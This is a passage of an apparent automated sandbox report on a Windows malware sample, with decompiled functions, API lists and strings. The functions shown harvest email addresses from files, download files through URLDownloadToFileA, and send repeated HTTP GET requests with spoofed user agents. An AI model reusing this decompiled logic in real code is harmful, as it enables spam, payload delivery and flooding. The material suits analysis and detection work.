									 *(_t92 +  &_v236) = _t101;
									_v248 = _t92 + 1;
									continue;
								}
							}
							_t83 = _v248;
							 *((char*)(_t83 +  &_v236)) = 0;
							if( *((char*)(_t83 +  &_v237)) == 0x40) {
								goto L47;
							}
							_t102 =  &_v236;
							_v284 = _t102;
							L0040C310();
							_t113 = _t113 - 4;
							if(_t83 > 9 &&  *((char*)(_v248 +  &_v237)) != 0x2e && _v236 != 0x40 && _v236 != 0x2e && _v236 != 0x2d) {
								 *_t113 = _t102;
								if(E00403008() == 0) {
									goto L47;
								}
								 *_t113 = _t102;
								if(E00402FC2(_t85, _t102) == 0) {
									goto L47;
								}
								 *_t113 = _t102;
								if(E0040305A() == 0) {
									goto L47;
								}
								while(E00404F0A(_t102, _t104) == 0) {
									 *_t113 = 0x7530;
									Sleep(??);
									_t113 = _t113 - 4;
								}
								_v268 =  &_v240;
								_v272 = 0;
								_v276 =  &_v236;
								_v280 = E00402288;
								_v284 = 0;
								 *_t113 = 0;
								CreateThread(??, ??, ??, ??, ??, ??);
								_t114 = _t113 - 0x18;
								 *_t114 = 0x28;
								Sleep(??);
								_t113 = _t114 - 4;
								if( *0x414018 == 4) {
									 *0x414018 = 0;
									 *_t113 = 0xfa0;
									Sleep(??);
									_t113 = _t113 - 4;
								}
								 *0x414018 =  *0x414018 + 1;
							}
							goto L47;
						}
						L11:
						if(_t110 == 0) {
							rewind(_t112);
							goto L18;
						}
						_t110 = _t110 - 1;
						fseek(_t112, _t110, 0);
						_t95 = fgetc(_t112);
						_t100 = _t95;
						if(_t95 == 0xffffffff) {
							fclose(_t112);
						}
						_t14 = _t100 - 0x61; // -97
						_t17 = _t100 - 0x41; // -65
						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
						if(_t104 != 0) {
							goto L11;
						}
						goto L15;
					}
				}
				fclose(_t112);
				_t64 = 0;
				goto L50;
			}

APIs

fopen.MSVCRT ref: 004030A7
fgetc.MSVCRT ref: 004030C6
fclose.MSVCRT ref: 004030D3
fopen.MSVCRT ref: 004030E6
rewind.MSVCRT ref: 00403102
fgetc.MSVCRT ref: 00403227
lstrlen.KERNEL32 ref: 00403258
Sleep.KERNEL32 ref: 004032DD
CreateThread.KERNEL32 ref: 00403321
Sleep.KERNEL32 ref: 00403330
Sleep.KERNEL32 ref: 00403352
fgetc.MSVCRT ref: 00403363
fclose.MSVCRT ref: 0040337E

Strings

-, xrefs: 00403297

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Sleepfgetc$fclosefopen$CreateThreadlstrlenrewind
String ID: -
API String ID: 3748466826-2547889144
Opcode ID: 28373200780021fc207e4293904c45f34d67fc74515178610104ffffb636ca7f
Instruction ID: 6d437ecd7483d23b259e28590f61e0e5bcbda088feaf823980ac16ccee795e59
Opcode Fuzzy Hash: 28373200780021fc207e4293904c45f34d67fc74515178610104ffffb636ca7f
Instruction Fuzzy Hash: 287182748043148AD720AF25C4C536EBFA8AF44715F1549BFE885AB3C1DB7C8B848B8B

Uniqueness

Uniqueness Score: -1.00%

Function 00403622 Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00403622(signed int __eax, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				char _v300;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v324;
				intOrPtr _v332;
				intOrPtr _v340;
				intOrPtr _v348;
				intOrPtr _v356;
				intOrPtr _v364;
				intOrPtr _v372;
				intOrPtr _v380;
				void* __ebx;
				signed int _t32;
				char _t37;
				char* _t38;
				intOrPtr _t41;
				signed int _t42;
				intOrPtr _t43;
				char _t44;
				char* _t45;
				void* _t46;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;

				_t42 = __edx;
				_t32 = __eax;
				_t47 = _t46 - 0x12c;
				_t43 = _a4;
				_t41 = _a8;
				_t37 = 0;
				_t44 = 0xffffffff;
				if( *((char*)(_t41 + 0x2c)) == 0) {
					L4:
					if(_t44 >= 0) {
						_v308 = 0x103;
						_v312 = _t41 + _t44 + 0x2d;
						_t38 =  &_v300;
						 *_t47 = _t38;
						L0040C350();
						_t48 = _t47 - 0xc;
						 *_t48 = _t38;
						_t32 = CharLowerA(??);
						_t47 = _t48 - 4;
					} else {
						_v300 = 0;
					}
					_v324 = 0x40efb2;
					_t45 =  &_v300;
					 *_t47 = _t45;
					L0040C318();
					_t49 = _t47 - 8;
					if(_t32 == 0) {
						L15:
						 *_t49 = _t43;
						_t32 =  ~((E00402F2E(1, _t42) & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
						if((0x00000001 & _t32) == 1) {
							 *_t49 = _t43;
							_t32 = E0040307E(_t42);
						}
						goto L17;
					} else {
						_v332 = 0x40efb7;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v340 = 0x40efbb;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v348 = 0x40efbf;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v356 = 0x40efc3;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v364 = 0x40efc7;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v372 = 0x40ee83;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 == 0) {
							goto L15;
						}
						_v380 = 0x40efca;
						 *_t49 = _t45;
						L0040C318();
						_t49 = _t49 - 8;
						if(_t32 != 0) {
							L17:
							return _t32;
						}
						goto L15;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					if( *((char*)(_t41 + _t37 + 0x2c)) == 0x2e) {
						_t44 = _t37;
					}
					_t37 = _t37 + 1;
					_t42 = _t42 & 0xffffff00 |  *((char*)(_t41 + _t37 + 0x2c)) != 0x00000000;
					_t32 = _t32 & 0xffffff00 | _t37 - 0x000000fe <= 0x00000000;
				} while ((_t42 & _t32) != 0);
				goto L4;
			}

APIs

lstrcpyn.KERNEL32 ref: 00403689
CharLowerA.USER32 ref: 00403694
lstrcmp.KERNEL32 ref: 004036B2
lstrcmp.KERNEL32 ref: 004036CD
lstrcmp.KERNEL32 ref: 004036E8
lstrcmp.KERNEL32 ref: 004036FF
lstrcmp.KERNEL32 ref: 00403716
lstrcmp.KERNEL32 ref: 0040372D
lstrcmp.KERNEL32 ref: 00403744
lstrcmp.KERNEL32 ref: 0040375B

Strings

doc, xrefs: 0040370B
php, xrefs: 00403739
xml, xrefs: 004036F4
C:\, xrefs: 00403626
html, xrefs: 004036A1
tbb, xrefs: 00403750
htm, xrefs: 004036C2
txt, xrefs: 004036DD

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: lstrcmp$CharLowerlstrcpyn
String ID: C:\$doc$htm$html$php$tbb$txt$xml
API String ID: 838419190-312059954
Opcode ID: dc05e5cdd392e04bc51eba1f7065f56e4f2167f4d31b7c461c5834b6df2cda79
Instruction ID: 6961f7bd5c8fa27dba0ec7a422f8e7192e07f4a6a10a31976eaf7852eedd0230
Opcode Fuzzy Hash: dc05e5cdd392e04bc51eba1f7065f56e4f2167f4d31b7c461c5834b6df2cda79
Instruction Fuzzy Hash: FE31B1B44047409AC7107F368A8526E7EE89B4078DF01897FEC80676C2D73C8A59CB9F

Uniqueness

Uniqueness Score: -1.00%

Function 00406F1C Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 123librarystringfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00406F5D
GetProcAddress.KERNEL32 ref: 00406F7A
FreeLibrary.KERNEL32 ref: 00406F8E
GetSystemDirectoryA.KERNEL32 ref: 00406FB1
lstrlen.KERNEL32 ref: 00406FBC
lstrcat.KERNEL32 ref: 00406FD9
_mbscat.MSVCRT ref: 00407014
DeleteFileA.KERNEL32 ref: 00407059

Strings

D, xrefs: 00407089
urlmon.dll, xrefs: 00406F56
URLDownloadToFileA, xrefs: 00406F6F
D, xrefs: 00407071

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Library$AddressDeleteDirectoryFileFreeLoadProcSystem_mbscatlstrcatlstrlen
String ID: D$D$URLDownloadToFileA$urlmon.dll
API String ID: 2488436691-568779862
Opcode ID: fab9268c9de8d3bab7c4baaba29abbe1fa75f4fbb9d0755a78414db1af5e4ff4
Instruction ID: 6020ed59d1fb2f3a26d031d0468f3da87cf9bf9a4133c77db0aeb5110a75bae0
Opcode Fuzzy Hash: fab9268c9de8d3bab7c4baaba29abbe1fa75f4fbb9d0755a78414db1af5e4ff4
Instruction Fuzzy Hash: F451E0B0804744CBD750EF29D98579EBBF0BF44314F404A6EE8899B381D7789688CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00402120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402120(intOrPtr _a4) {
				intOrPtr _v76;
				char _v82;
				short _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v104;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				void* _t69;
				short* _t70;
				signed int _t71;
				intOrPtr _t72;
				void* _t73;
				void* _t74;
				intOrPtr* _t75;

				_t72 = _a4;
				_t69 =  &_v92;
				asm("cld");
				memset(_t69, 0, 3 << 2);
				_t75 = _t74 + 0xc;
				_t70 = _t69 + 3;
				 *_t70 = 0;
				 *((char*)(_t70 + 2)) = 0;
				_v92 = 0x6b6c7665;
				_v88 = 0x686f6472;
				_v84 = 0x706c;
				_v82 = 0;
				_t9 =  &_v92; // 0x6b6c7665
				_v104 = _t9;
				 *_t75 = 0x40e44a;
				E00404C6A();
				E00402106();
				_t64 =  *0x414008;
				_t71 = 0;
				do {
					_t67 = _t64 * 0xcccccccd >> 0x20 >> 3;
					 *((intOrPtr*)(_t73 + _t71 * 4 - 0x48)) = _t64 - _t67 + _t67 * 4 + _t67 + _t67 * 4;
					_t64 = _t67;
					_t71 = _t71 + 1;
				} while (_t71 <= 9);
				_t68 = 0;
				do {
					 *((char*)(_t68 + _t72)) =  *( *((intOrPtr*)(_t73 + _t68 * 4 - 0x48)) +  &_v92) & 0x000000ff;
					_t68 = _t68 + 1;
				} while (_t68 <= 9);
				 *((char*)(_t72 + 0xa)) = 0;
				if(_v76 != 0) {
					if(_v76 != 1) {
						if(_v76 != 2) {
							if(_v76 != 3) {
								if(_v76 != 4) {
									if(_v76 != 5) {
										if(_v76 != 6) {
											_t53 =  *0x40d07c; // 0x40e446
											_v104 = _t53;
											 *_t75 = _t72;
											L0040C208();
											return _t53;
										}
										_t54 =  *0x40d078; // 0x40e440
										_v104 = _t54;
										 *_t75 = _t72;
										L0040C208();
										return _t54;
									}
									_t55 =  *0x40d074; // 0x40e43c
									_v104 = _t55;
									 *_t75 = _t72;
									L0040C208();
									return _t55;
								}
								_t56 =  *0x40d070; // 0x40e437
								_v104 = _t56;
								 *_t75 = _t72;
								L0040C208();
								return _t56;
							}
							_t57 =  *0x40d06c; // 0x40e432
							_v104 = _t57;
							 *_t75 = _t72;
							L0040C208();
							return _t57;
						}
						_t58 =  *0x40d068; // 0x40e42e
						_v104 = _t58;
						 *_t75 = _t72;
						L0040C208();
						return _t58;
					}
					_t59 =  *0x40d064; // 0x40e429
					_v104 = _t59;
					 *_t75 = _t72;
					L0040C208();
					return _t59;
				}
				_t60 =  *0x40d060; // 0x40e424
				_v104 = _t60;
				 *_t75 = _t72;
				L0040C208();
				return _t60;
			}

APIs

_mbscat.MSVCRT ref: 004021CC
_mbscat.MSVCRT ref: 004021E8
_mbscat.MSVCRT ref: 00402204

Strings

$@, xrefs: 004021C0
@@, xrefs: 0040225C
.@, xrefs: 004021F8
7@, xrefs: 0040222A
<@, xrefs: 00402243
)@, xrefs: 004021DC
2@, xrefs: 00402211
evlkrdohlp, xrefs: 0040215D
F@, xrefs: 0040226F

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: _mbscat
String ID: $@$)@$.@$2@$7@$<@$@@$F@$evlkrdohlp
API String ID: 134015809-3435826350
Opcode ID: c12f48e13e570ad5b0255dc16d45f781d8719ac7601166f7755f4ed953bb1293
Instruction ID: 21a54818e9aca3eeccc7b18a3caaa5206cc12068587b62876ebf60fed946ae37
Opcode Fuzzy Hash: c12f48e13e570ad5b0255dc16d45f781d8719ac7601166f7755f4ed953bb1293
Instruction Fuzzy Hash: 7D411A70E04244DBCB509FA9D68565EBBF0AB45708F10457FE498AB3C1D3789986CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0E0 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040B0E0(void* __eax) {
				void* _v16;
				short _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v108;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v188;
				int _v192;
				void* __ebx;
				char _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				void* _t65;
				intOrPtr _t71;
				intOrPtr _t73;
				signed char _t75;
				char _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				void* _t90;
				void* _t92;
				signed int _t93;
				signed int _t94;
				void* _t96;
				signed int _t101;
				intOrPtr _t103;
				intOrPtr _t104;
				void* _t105;
				signed int _t106;
				signed int _t109;
				signed int _t110;
				signed int* _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				signed int* _t115;

				_t94 =  *0x418284;
				if(_t94 == 0) {
					_v108 = 0x41414141;
					_t51 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
					_t110 =  &_v108;
					_v104 = 0x41414141;
					_v100 = 0x41414141;
					_v76 = _t51;
					_t52 = M004131B4; // 0x57434347
					_v96 = 0x41414141;
					_v92 = 0x41414141;
					_v72 = _t52;
					_t53 = M004131B8; // 0x452d3233
					_v88 = 0x41414141;
					_v84 = 0x41414141;
					_v68 = _t53;
					_t54 = M004131BC; // 0x2d322d48
					_v80 = 0x41414141;
					_v64 = _t54;
					_t55 = M004131C0; // 0x4a4c4a53
					_v60 = _t55;
					_t56 = M004131C4; // 0x4854472d
					_v56 = _t56;
					_t57 = M004131C8; // 0x494d2d52
					_v52 = _t57;
					_t58 =  *0x4131cc; // 0x3357474e
					_v48 = _t58;
					_v44 =  *0x4131d0 & 0x0000ffff;
					 *_t111 = _t110;
					_t61 = FindAtomA(??) & 0x0000ffff;
					_t112 = _t111 - 4;
					_v192 = _t61;
					if(_t61 != 0) {
						L10:
						_t93 = E0040B040(_t61, _t92);
					} else {
						 *_t112 = 0x3c;
						_t65 = malloc(??);
						_t93 = _t65;
						if(_t65 == 0) {
							abort();
							0;
							0;
							_push(_t94);
							_t96 = _t112 + 8;
							while(_t65 >= 0x1000) {
								_t96 = _t96 - 0x1000;
								_t65 = _t65 - 0x1000;
							}
							goto __eax;
						}
						asm("cld");
						memset(_t65, _v192, 0xf << 2);
						_t114 = _t112 + 0xc;
						 *((intOrPtr*)(_t93 + 4)) = L0040C278;
						_t101 = 1;
						 *((intOrPtr*)(_t93 + 8)) = E0040B030;
						 *_t93 = 0x3c;
						 *((intOrPtr*)(_t93 + 0x28)) = 0;
						 *((intOrPtr*)(_t93 + 0x14)) =  *0x418254;
						_t71 =  *0x40d4f0; // 0x0
						 *((intOrPtr*)(_t93 + 0x18)) =  *0x418258;
						_t103 =  *0x40d4f4; // 0xffffffff
						 *((intOrPtr*)(_t93 + 0x1c)) = _t71;
						 *((intOrPtr*)(_t93 + 0x20)) = _t103;
						 *((intOrPtr*)(_t93 + 0x30)) = 0xffffffff;
						 *((intOrPtr*)(_t93 + 0x2c)) =  *0x418264;
						_t104 =  *0x40d4fc; // 0xffffffff
						_t73 =  *0x40d4f8; // 0x0
						 *((intOrPtr*)(_t93 + 0x38)) = _t104;
						_t105 = 0x1f;
						 *((intOrPtr*)(_t93 + 0x34)) = _t73;
						do {
							_t75 = _t93 & _t101;
							asm("sbb eax, eax");
							_t101 = _t101 + _t101;
							 *((char*)(_t105 +  &_v188)) = (_t75 & 0x00000020) + 0x41;
							_t105 = _t105 - 1;
						} while (_t105 >= 0);
						_t78 = "-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32"; // 0x42494c2d
						_v156 = _t78;
						_t79 = M004131B4; // 0x57434347
						_v152 = _t79;
						_t80 = M004131B8; // 0x452d3233
						_v148 = _t80;
						_t81 = M004131BC; // 0x2d322d48
						_v144 = _t81;
						_t82 = M004131C0; // 0x4a4c4a53
						_v140 = _t82;
						_t83 = M004131C4; // 0x4854472d
						_v136 = _t83;
						_t84 = M004131C8; // 0x494d2d52
						_v132 = _t84;
						_t85 =  *0x4131cc; // 0x3357474e
						_v128 = _t85;
						_v124 =  *0x4131d0 & 0x0000ffff;
						 *_t114 =  &_v188;
						_t109 = AddAtomA(??) & 0x0000ffff;
						_t115 = _t114 - 4;
						if(_t109 != 0) {
							_t90 = E0040B040(_t109, _t93);
							_t106 = _t109;
							if(_t90 != _t93) {
								goto L7;
							} else {
								goto L8;
							}
							goto L19;
						} else {
							L7:
							_t106 = 0;
						}
						L8:
						if(_t106 == 0) {
							 *_t115 = _t93;
							L0040C1C8();
							 *_t115 = _t110;
							_t61 = FindAtomA(??) & 0x0000ffff;
							goto L10;
						}
					}
					 *0x418284 = _t93;
					_t46 = _t93 + 4; // 0x4
					 *0x418274 = _t46;
					_t47 = _t93 + 8; // 0x8
					_t64 = _t47;
					 *0x418294 = _t64;
					return _t64;
				} else {
					return __eax;
				}
				L19:
			}

0x0040b0ec
0x0040b0f4
0x0040b0fe
0x0040b105
0x0040b10a
0x0040b10d
0x0040b114
0x0040b11b
0x0040b11e
0x0040b123
0x0040b12a
0x0040b131
0x0040b134
0x0040b139
0x0040b140
0x0040b147
0x0040b14a
0x0040b14f
0x0040b156
0x0040b159
0x0040b15e
0x0040b161
0x0040b166
0x0040b169
0x0040b16e
0x0040b171
0x0040b176
0x0040b180
0x0040b184
0x0040b18d
0x0040b190
0x0040b195
0x0040b19b
0x0040b2dc
0x0040b2e1
0x0040b1a1
0x0040b1a1
0x0040b1a8
0x0040b1af
0x0040b1b1
0x0040b310
0x0040b31b
0x0040b31f
0x0040b320
0x0040b323
0x0040b326
0x0040b32d
0x0040b336
0x0040b336
0x0040b34b
0x0040b34b
0x0040b1b7
0x0040b1c5
0x0040b1c5
0x0040b1c7
0x0040b1ce
0x0040b1d3
0x0040b1df
0x0040b1eb
0x0040b1f2
0x0040b1f5
0x0040b1fa
0x0040b1fd
0x0040b203
0x0040b20b
0x0040b20e
0x0040b215
0x0040b218
0x0040b21e
0x0040b223
0x0040b226
0x0040b22b
0x0040b230
0x0040b232
0x0040b237
0x0040b23b
0x0040b23f
0x0040b246
0x0040b246
0x0040b249
0x0040b24e
0x0040b254
0x0040b259
0x0040b25f
0x0040b264
0x0040b26a
0x0040b26f
0x0040b275
0x0040b27a
0x0040b280
0x0040b285
0x0040b28b
0x0040b290
0x0040b293
0x0040b298
0x0040b2a2
0x0040b2ac
0x0040b2b5
0x0040b2b8
0x0040b2bd
0x0040b303
0x0040b30a
0x0040b30c
0x00000000
0x0040b30e
0x00000000
0x0040b30e
0x00000000
0x0040b2bf
0x0040b2bf
0x0040b2bf
0x0040b2bf
0x0040b2c1
0x0040b2c3
0x0040b2c5
0x0040b2c8
0x0040b2cd
0x0040b2d9
0x00000000
0x0040b2d9
0x0040b2c3
0x0040b2e3
0x0040b2e9
0x0040b2ec
0x0040b2f1
0x0040b2f1
0x0040b2f4
0x0040b300
0x0040b0f6
0x0040b0fd
0x0040b0fd
0x00000000

APIs

FindAtomA.KERNEL32 ref: 0040B187
malloc.MSVCRT ref: 0040B1A8
AddAtomA.KERNEL32 ref: 0040B2AF

Strings

AAAA, xrefs: 0040B114
AAAA, xrefs: 0040B0FE
-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32, xrefs: 0040B105, 0040B249
AAAA, xrefs: 0040B123
AAAA, xrefs: 0040B10D
AAAA, xrefs: 0040B139
AAAA, xrefs: 0040B140
AAAA, xrefs: 0040B14F
AAAA, xrefs: 0040B12A

Memory Dump Source

Source File: 00000005.00000002.340540181.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.340534914.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340554111.0000000000419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340559200.000000000041C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340572185.000000000041D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.340576285.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_smnss.jbxd

Similarity

API ID: Atom$Findmalloc
String ID: -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA$AAAA
API String ID: 822928543-4229226183
Opcode ID: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
Instruction ID: 5c8a408c4dcb306db70316dfdce650025cae950a5a82f7704b97cd34435e599e
Opcode Fuzzy Hash: b996283103914c8c547a0f5b047768b3d30837a48cc31e111859e5c4cfbbb589
Instruction Fuzzy Hash: DC6107B4A00218DFDB50CFA9E9C4699BBF0FB48311F1481BAD818EB395E7349945CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00406A48 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 82
sleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00406A48(void* __eflags, intOrPtr* _a4) {
				void* _v16;
				char _v1052;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				char* _v1100;
				char* _v1104;
				char* _v1108;
				char* _v1112;
				char* _v1116;
				char* _v1120;
				char* _v1124;
				char* _v1128;
				char* _v1132;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				char _v1156;
				char* _v1160;
				void* __ebx;
				signed int _t39;
				char _t45;
				intOrPtr* _t49;
				char _t50;
				intOrPtr _t51;
				char _t63;
				char _t64;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t70;

				_t67 = _t66 - 0x47c;
				_t49 = _a4;
				_v1132 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
				_v1128 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)";
				_v1124 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)";
				_v1120 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
				_v1116 = "Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1";
				_v1112 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)";
				_v1108 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)";
				_v1104 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
				_v1100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
				 *_t67 = 9;
				_t39 = E00404EAE();
				_t51 =  *_t49;
				_v1084 = _t51;
				_t63 =  *((intOrPtr*)(_t49 + 4));
				_v1080 = _t63;
				_v1076 =  *((intOrPtr*)(_t49 + 8));
				_v1072 =  *((intOrPtr*)(_t49 + 0xc));
				_v1068 =  *((intOrPtr*)(_t49 + 0x10));
				_v1148 = _t51;
				_v1152 =  *((intOrPtr*)(_t65 + _t39 * 4 - 0x468));
				_v1156 = _t63;
				_v1160 = "GET %s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\n";
				_t50 =  &_v1052;
				 *_t67 = _t50;
				wsprintfA(??, ??);
				asm("cld");
				asm("repne scasb");
				 *((short*)(0xffffffff + _t50)) = 0xa0d;
				 *((char*)(0xbadbac + _t50 + 2)) = 0;
				_t64 = _t50;
				while(1) {
					_t45 = E00405434(_v1084, _t50, _v1084, _v1076);
					_t50 = _t45;
					if(_t45 == 0xffffffff) {
						break;
					}
					asm("cld");
					asm("repne scasb");
					_v1144 = 0;
					_v1148 = 0xbadbac;
					_v1152 = _t64;
					_v1156 = _t50;
					L004086B0();
					_t69 = _t67 - 0x10;
					 *_t69 = _t50;
					L004086C0();
					_t70 = _t69 - 4;
					 *_t70 = _v1068;
					Sleep(??);
					_t67 = _t70 - 4;
				}
				return 0;
			}

APIs

Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5

wsprintfA.USER32 ref: 00406B0D

Part of subcall function 00405434: WSASocketA.WS2_32 ref: 0040546A
Part of subcall function 00405434: htons.WS2_32 ref: 00405485
Part of subcall function 00405434: WSAConnect.WS2_32 ref: 004054D7

send.WS2_32 ref: 00406B6F
closesocket.WS2_32 ref: 00406B7A
Sleep.KERNEL32 ref: 00406B8B

Strings

Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0), xrefs: 00406A9D
GET %s HTTP/1.1Connection: Keep-AliveUser-Agent: %sHost: %sAccept: */*, xrefs: 00406AFC
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;), xrefs: 00406A93
